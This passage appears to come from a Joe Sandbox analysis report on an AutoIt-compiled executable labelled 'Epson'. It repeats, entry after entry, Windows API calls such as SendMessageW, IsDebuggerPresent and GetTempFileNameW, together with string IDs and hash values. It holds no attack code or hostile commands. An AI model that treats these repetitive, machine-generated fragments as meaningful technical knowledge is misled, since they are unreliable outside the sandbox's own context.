                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 52e60bd29f3b3eaafd38dd7ab0a5321c26c058105c4fe289f20b2ac0734cea41
                                                                                                                                                                                                                                      • Instruction ID: c3f2c166c4ded245c414d77be36bb2a439da6e7374b605881d49b151e2daee11
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52e60bd29f3b3eaafd38dd7ab0a5321c26c058105c4fe289f20b2ac0734cea41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3101A7B5A411096BCB14E791CD62EFF77A8DF46341F580019790267281DA599E0CAAB1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FB45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00FB4620
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FB2615
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 00e1cc6bb0464fedde3c707e85037b39430b9c391f420db587d537b95afac57b
                                                                                                                                                                                                                                      • Instruction ID: 123ae6fca8a08f25a8166473f81ba93134d4e4969c94c5549341587710f1d9b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00e1cc6bb0464fedde3c707e85037b39430b9c391f420db587d537b95afac57b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2401A276A4010566CB15F7A1DD51EFF77B89B05340F540029B902B7282DB699E0CBAB2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FB45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00FB4620
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00FB2720
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 9d06dec0aba87a1394cd4820aafaec9451ac7dde0e4c6f56e28c3f5a18b7ff2f
                                                                                                                                                                                                                                      • Instruction ID: 5b703e7f1fd1949cb26aee480c9122eb475becfd00196b76dca24716d4d0f0bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d06dec0aba87a1394cd4820aafaec9451ac7dde0e4c6f56e28c3f5a18b7ff2f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FF02875A4021467CB14F3A58C91FFE737CEF02351F540919B862B72C2DF69580CEA60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FB146F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                      • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                      • Opcode ID: 82832b04f729b3cff96b90ef3b0bfec5b211af58db19d3e29c1397569a8c8a61
                                                                                                                                                                                                                                      • Instruction ID: 6ca17ff11eed5f95ad90a87e763d49a8fe668cd3199447fa6ee210703fb32362
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82832b04f729b3cff96b90ef3b0bfec5b211af58db19d3e29c1397569a8c8a61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EE048313447587BD2142795BC03FC97A858F05B61F61842BF78C698C34EE76450769B
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F6FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F710E2,?,?,?,00F5100A), ref: 00F6FAD9
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00F5100A), ref: 00F710E6
                                                                                                                                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F5100A), ref: 00F710F5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F710F0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                      • API String ID: 55579361-631824599
                                                                                                                                                                                                                                      • Opcode ID: 893de1e739ee30f2586b82eccc01d71600c8ee21fcac64e2cde91f7b885763c3
                                                                                                                                                                                                                                      • Instruction ID: aaa8bd21160831dec725e20d061867f731891b5a8f7a72836cf032873109da69
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 893de1e739ee30f2586b82eccc01d71600c8ee21fcac64e2cde91f7b885763c3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9E06D706003518BD3309F68E844302BBE8BF00301F40895EE989CA692EBB8D448EB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00FC39F0
                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00FC3A05
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                      • String ID: aut
                                                                                                                                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                      • Opcode ID: 8a0bf206bddb9c0c81a70e8731cb41e9d0684259704d236c2f03767ce4b7dcb0
                                                                                                                                                                                                                                      • Instruction ID: 525f2bc082695a1a8f34f0e48514341650019cf2c283c981dfd4ec6885687efc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a0bf206bddb9c0c81a70e8731cb41e9d0684259704d236c2f03767ce4b7dcb0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62D05E729003286BDA20A7A59C4EFCB7A6CDB44610F4002A1BB959A091DAB4DA85CB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FE2E08
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 00FE2E0F
                                                                                                                                                                                                                                        • Part of subcall function 00FBF292: Sleep.KERNEL32 ref: 00FBF30A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                      • Opcode ID: dd6e09a6a3d00c699b452b124afed63214a5907ad6b66f330567c770227e03fc
                                                                                                                                                                                                                                      • Instruction ID: cfcdc77119b797cc953eaf8de65b7314fae707d8c15afe30b29f6f69067b1451
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd6e09a6a3d00c699b452b124afed63214a5907ad6b66f330567c770227e03fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DD022353C13447BF224B330EC4FFC23B10AB00B00F1048347345AE4D0C8E46800DA44
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FE2DC8
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FE2DDB
                                                                                                                                                                                                                                        • Part of subcall function 00FBF292: Sleep.KERNEL32 ref: 00FBF30A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                      • Opcode ID: e8a118daaefc58203920b2bc09485d1a8a406b2fa36ab7e0e076fd764848608f
                                                                                                                                                                                                                                      • Instruction ID: 4350cdc46e121bf09ea5f25c23ce909568bdd1a620e1abbd7151f85358c80906
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8a118daaefc58203920b2bc09485d1a8a406b2fa36ab7e0e076fd764848608f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FD02239380344BBE224B330EC4FFD23B10AF00B00F1048347349AE4D0C8E46800DA40
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F8C213
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00F8C221
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F8C27C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                      • Opcode ID: 31553b07c561ecb9926cdbbe631f6a6ae9c1d778160bb7647e3355b4b4166957
                                                                                                                                                                                                                                      • Instruction ID: 41cf17d3ac5c23d0eea5a5408f7ea5f6afe4f354e9660f0818e4f73c6c6e3c56
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31553b07c561ecb9926cdbbe631f6a6ae9c1d778160bb7647e3355b4b4166957
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B41E531A00605AFDB21AFE4CC44BFA7BA5EF11320F244169F9599B1E1DB308D00EBB0